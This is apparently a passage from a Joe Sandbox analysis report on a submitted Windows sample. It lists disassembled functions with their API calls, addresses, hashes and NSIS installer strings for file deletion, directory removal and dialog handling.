                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: CountFileNameTempTick
                                                • String ID: nsa
                                                • API String ID: 1716503409-2209301699
                                                • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98
                                                Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                Download Yara Rule
                                                APIs
                                                • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: Window$EnableShowlstrlenwvsprintf
                                                • String ID: HideWindow
                                                • API String ID: 1249568736-780306582
                                                • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                Function 00405E7C Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: File$AttributesCreate
                                                • String ID:
                                                • API String ID: 415043291-0
                                                • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                Function 00405E5C Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                Function 004037F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                  • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                  • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                  • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: Char$Next$CreateDirectoryPrev
                                                • String ID:
                                                • API String ID: 4115351271-0
                                                • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                Function 00403DDB Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                                • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                                Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                Function 00403DC4 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                Function 00403DB1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                Download Yara Rule
                                                APIs
                                                • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: CallbackDispatcherUser
                                                • String ID:
                                                • API String ID: 2492992576-0
                                                • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19

                                                Non-executed Functions

                                                Function 004049A8 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                • DeleteObject.GDI32(?), ref: 00404AA5
                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                • ShowWindow.USER32(00000000), ref: 00404F87
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                • String ID: $ @$M$N
                                                • API String ID: 1638840714-3479655940
                                                • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                Function 00406CC7 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 190filestringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                • lstrlenW.KERNEL32(?), ref: 00406D58
                                                • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                • FindClose.KERNEL32(?), ref: 00406E5F
                                                Strings
                                                • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                • ptF, xrefs: 00406D1A
                                                • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                • \*.*, xrefs: 00406D2F
                                                • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                • API String ID: 2035342205-1650287579
                                                • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                Function 004044D1 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 300stringkeyboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                • SHBrowseForFolderW.SHELL32(?), ref: 00404669
